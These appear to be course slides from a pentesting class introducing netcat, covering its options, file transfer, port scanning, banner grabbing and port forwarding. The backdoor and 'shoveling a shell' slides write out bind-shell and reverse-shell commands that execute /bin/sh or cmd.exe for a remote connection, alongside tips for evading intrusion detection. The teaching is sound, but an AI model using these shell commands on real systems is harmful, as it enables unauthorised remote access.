COMP265 - Pentesting

netcat

What?

• Like cat, but for networks

• Standard input sent over network to remote ip:port

• Packets from network sent to standard output

• Low level

• Versatile

• “The network Swiss army knife”

Basic Operation

• Client mode:

– Connects to specific remote port

• Listen mode:

– Waits for connection on a port

• Both modes

– Send Standard Input to net

– Data from net sent to Standard Output

• Messages from netcat sent to standard Error

• Packets can have source routing attached

Netcat Command• May be two letter command “nc”

– Like cp and other traditional two letter unix commands

– nc options hostname ports

• May be the word “netcat”

• Another variant “ncat”, from nmap project

– Supports a few more options

• Depends on the platform, Kali has both

• Sometimes have to compile from source to get all options (Suse)

Command Options-l listen mode, for inbound connects

-L "Listen harder" Persistent listener (Win only)

-n numeric-only IP addresses, no DNS

-p port local port number

-r randomize local and remote ports

-s addr local source address

-u UDP mode

--sctp sctp mode

-v verbose [use twice to be more verbose]

Command Options

-i secs delay interval for lines sent, ports scanned

-t answer TELNET negotiation

-w secs timeout for connects and final net reads

-z zero-I/O mode [used for scanning]

These three options not available on some packages

-o file or -x file (hex) dump of traffic

-e prog or -c command program to exec after connect

-g gateway source-routing hop point[s], up to 8

What for?• Send files

• Telnet

• Backdoor

• Port scan

• Banner grabbing

• Reverse shell

• Relay (proxy)

• Port forward

• Replay

Arguments

• Host can be name or ip

-n = no dns lookups, ip only

otherwise

full DNS forward and reverse lookup

-v or -vv = verbose messages, always sent to standard error

-w limits wait time, -w 3 recommended

-o filename produces dump of all traffic > or <

-i slows down sending, used if input from a file

Send Files

• Sender

– nc -l -p 80 < file.txt

– file.txt | nc -l -p 80

• Reciever

– nc 192.168.1.1 80 > file.txt

• Note use of redirect and pipe

• Receiver could have been a web browser

• < > | all enhance power of netcat

Another Example

dd if=/dev/sda3 | gzip | nc -l 80

nc 192.168.17.1 80 > sda3.img.gz

• Or, listener can be receiver

nc -w 3 -l 80 > /home.cmb.tar.gz

tar -cvf - /home/cmb | gzip | nc 192.168.17.1 80

nc telnet

cmblap:~ # telnet 192.168.17.24 25

Trying 192.168.17.24...

Connected to 192.168.17.24.

Escape character is '^]'.

220 fivefortyfour.com ESMTP

^C

^]

telnet> quit

Connection closed.

cmblap:~ # netcat 192.168.17.24 25

220 fivefortyfour.com ESMTP

helo

250 fivefortyfour.com

quit

221 fivefortyfour.com

cmblap:

As telnet client

• Netcat quits when you want it to

• Doesn't pay attention to standard input EOF

• Doesn't require escape character

• Less cruft

• Transfers arbitrary binary data

• Better utility for probing services

• Can use UDP

-t responds automatically to telnet option negotiations

Probing?• Netcat can do port scans This took around 1 seccmblap:~ # netcat -v -w 2 -z 192.168.17.24 20-1000

jabber.fivefortyfour.com [192.168.17.24] 631 (ipp) open

jabber.fivefortyfour.com [192.168.17.24] 445 (microsoft-ds) open

jabber.fivefortyfour.com [192.168.17.24] 139 (netbios-ssn) open

jabber.fivefortyfour.com [192.168.17.24] 111 (sunrpc) open

jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open

jabber.fivefortyfour.com [192.168.17.24] 80 (http) open

jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open

jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open

jabber.fivefortyfour.com [192.168.17.24] 24 (?) open

jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open

cmblap:~ #

UDP scans too

• These are much slowercmblap:~ # netcat -v -w 2 -z -u 192.168.17.24 20-100

jabber.fivefortyfour.com [192.168.17.24] 67 (bootps) open

jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open

Scanning Options

-i

– Delay interval to slow down scans

-r

– Randomise ports, including source

-z

– Send no data (TCP) or minimal data (UDP)

-i and -r help to avoid ids

-vv reports closed ports

Fancier Scan

echo QUIT | nc -v -w 5 target-host 20-250 500-600 5990-7000

Banner Grabbing

cmblap:~ # netcat -v 192.168.17.24 110

jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open

+OK Hello there.

quit

+OK Better luck next time.

cmblap:~ # netcat -v 192.168.17.24 25

jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open

220 fivefortyfour.com ESMTP

quit

221 fivefortyfour.com

cmblap:~ # netcat -v 192.168.17.24 22

jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open

SSH-1.99-OpenSSH_4.1

quit

Protocol mismatch.

Chat Session

• Just for fun

• Machine 192.168.17.6

– nc -l -p 1234

• Machine 2

– nc 192.168.17.6 1234

• Both machine's keyboard input appears on the other machine's screen

• Note: use -v option to solve problems that may appear

Web Browser

echo “GET somewhere.com” | nc address 80 > page.html

Backdoor

• By routing netcat's standard output to a command interpreter, we create a remote shell

cmblap:/usr/local/src/netcat-0.7.1/src # ./netcat -l -n -v -s 192.168.18.8 -p 1234 -e /bin/sh

Connection from 192.168.18.1:4289

cmblap:/usr/local/src/netcat-0.7.1/src #

• I had to dl and build to enable the -e switch

• Cannot pass parameters to program

On the other end

pdlnx2:~ # netcat -v 192.168.18.8 1234

DNS fwd/rev mismatch: cmblap.fivefortyfour.com != cmblap

cmblap.fivefortyfour.com [192.168.18.8] 1234 (search-agent) open

df

Filesystem 1K-blocks Used Available Use% Mounted on

/dev/sda6 20641788 7448780 12144368 39% /

udev 1540268 192 1540076 1% /dev

/dev/sda2 39942856 8711724 31231132 22% /windows/C

/dev/sda8 20650996 17395552 2206404 89% /home/cmb

exit

pdlnx2:~ #

More backdoors

• On windows:

nc -L -p 1234 -d -e cmd.exe

• -L means listen hard

– wait for connections

– Not needed on unix

• -d means detach from process

– Also not needed on linux

“Shoveling” a Shell• Aka Reverse Shell

• Compromised machine cannot accept connections

– Has to initiate connections because of firewall/NAT

• Attacker listens from outside the firewall

– netcat -v -l -p 1234

• Script on compromised machine starts shell then connects to attacker

– netcat ip.addr 1234 -e /bin/sh

• Script has to run forever, or at timed intervals, or in response to some event

Port Forwarding

• Forwarding localhost port 8080 to remote host port 80

• ncat -l localhost 8080 --sh-exec "ncat remote.host 80"

References

• ncat– http://nmap.org/ncat/– User's guide is good reference

• http://nmap.org/ncat/guide/index.html

• netcat– http://netcat.sourceforge.net/

• Don't forget the man pages

Lab

• Lab today will exercise many of these functions

• Due the day of the lab next week, Feb 18

– No new lab next week